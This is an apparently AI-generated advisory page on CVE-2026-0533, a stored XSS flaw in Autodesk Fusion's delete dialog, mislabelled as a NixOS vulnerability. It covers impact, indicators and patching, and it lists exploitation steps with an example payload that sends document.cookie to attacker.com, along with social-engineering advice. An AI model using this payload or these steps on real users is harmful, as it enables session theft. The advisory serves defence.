CVE-2026-0533
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-0533 is a Stored Cross-Site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A maliciously crafted HTML payload embedded in a design name is rendered unsanitized within the delete confirmation dialog; if a user clicks on it, the payload executes arbitrary code in the context of the running process. All Autodesk Fusion versions prior to 2606.1.21 are affected. The CVE was published on January 22, 2026, with a patch released by January 30, 2026. It carries a CVSS v3.1 base score of 8.1 (High), as assigned by Autodesk (Autodesk Advisory, NVD).

Technical details

The root cause is improper neutralization of user-supplied input during HTML page generation (CWE-79), specifically within the design name field of the Autodesk Fusion desktop application. When a user initiates a delete action on a design whose name contains a malicious HTML/JavaScript payload, the application renders the name without sanitization in the confirmation dialog, allowing the script to execute. Exploitation requires that an attacker first be able to supply or share a maliciously named design file with the victim — for example, via a shared project or a crafted file sent through collaboration channels — and that the victim then attempt to delete the design and interact with the dialog. No public proof-of-concept exploit code has been identified (Autodesk Advisory, NVD).

Impact

Successful exploitation allows an attacker to execute arbitrary code or read local files within the security context of the Autodesk Fusion process, resulting in high confidentiality and integrity impact. An attacker could exfiltrate sensitive design data, local files accessible to the Fusion process, or perform unauthorized actions on the victim's system. Availability is not directly impacted, and the scope is limited to the affected process (unchanged scope), but the potential for data theft and code execution on engineering workstations — which may hold proprietary design IP — represents a significant business risk (Autodesk Advisory, NVD).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Autodesk Advisory). The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. Exploitation requires user interaction — specifically, a victim must attempt to delete a maliciously named design and click within the confirmation dialog — which limits opportunistic exploitation.

Exploitation steps

  1. Craft a malicious design name: Create or modify an Autodesk Fusion design file so that its name contains an HTML/JavaScript payload (e.g., <img src=x onerror=fetch('http://attacker.com/?f='+document.cookie)> or a payload that reads local files via the application's file access APIs).
  2. Deliver the malicious design to the target: Share the crafted design with the victim through Autodesk collaboration features, email, or by placing the file in a shared project workspace accessible to the target user.
  3. Wait for victim interaction: The payload is triggered only when the victim attempts to delete the malicious design. The attacker may use social engineering to prompt the victim to delete the file (e.g., claiming it is a duplicate or outdated).
  4. Payload execution: When the victim opens the delete confirmation dialog in Autodesk Fusion, the application renders the design name — including the injected HTML/JavaScript — without sanitization. If the user clicks on or interacts with the rendered payload in the dialog, the script executes within the Fusion process context.
  5. Achieve objective: The executed script can read local files accessible to the Fusion process, exfiltrate data to an attacker-controlled server, or execute further arbitrary code, depending on the capabilities exposed by the application's embedded browser/renderer (Autodesk Advisory, NVD).

Indicators of compromise

  • File System: Autodesk Fusion design files (.f3d, .f3z, or project files) with names containing HTML tags, JavaScript syntax, or unusual special characters (e.g., <, >, script, onerror, onload).
  • Network: Unexpected outbound HTTP/HTTPS requests originating from the Autodesk Fusion process (Fusion360.exe or equivalent) to external or unknown IP addresses, particularly shortly after a user interacts with a delete confirmation dialog.
  • Logs: Application or system logs showing Autodesk Fusion spawning unexpected child processes or making unusual file read operations outside of normal design directories.
  • Process: Unusual child processes spawned by the Fusion application process, or unexpected network connections initiated by the Fusion renderer/browser component.

Mitigation and workarounds

Autodesk has released a patch in Autodesk Fusion version 2606.1.21; all users should upgrade immediately (Autodesk Advisory). Patched installers are available for both Windows and macOS via Autodesk's official download links. For users unable to patch immediately: exercise caution when opening or deleting designs received from untrusted sources, avoid clicking on suspicious or unexpected text within confirmation dialogs, and inspect design names for HTML-like syntax or special characters before deletion. Organizations should also consider restricting design sharing permissions to trusted collaborators until the patch is applied.

Community reactions

The vulnerability was noted in CISA's weekly vulnerability bulletin (week of January 19, 2026) and covered by security aggregators including Red Packet Security and VulnDB (CISA Bulletin, Red Packet Security). No significant independent researcher commentary or social media discussion has been identified beyond standard CVE aggregation and alerting.

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18713HIGH8.8
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-18669HIGH8.8
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-18235HIGH8.3
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-17420MEDIUM6.3
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-18250MEDIUM5
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management